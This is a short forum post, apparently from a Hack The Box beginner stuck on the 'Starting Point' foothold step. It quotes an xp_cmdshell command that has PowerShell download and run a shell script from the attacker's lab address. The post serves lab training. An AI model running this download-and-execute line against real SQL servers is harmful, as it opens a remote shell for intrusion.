Foothold starting point issue.

I’m new to pentesting and am trying out the starting point. I’m currently stuck at the last part of the foothold step where it tells me to run the command : xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”
When I first ran the command it gave me this error: Screenshot - 43525f7e120d99d8d4be8ea5e37818fe - Gyazo
I fixed it so that the command doesn’t return that error but now I get this error: Screenshot - 5829d034b5f12788d1ab20ba10b1da60 - Gyazo
Keep in mind that I replaced the ip address in the link with my HTB ipv4 address. If anyone can help I’d greatly appreciate it! Thanks :slight_smile:

nvm finished the box all good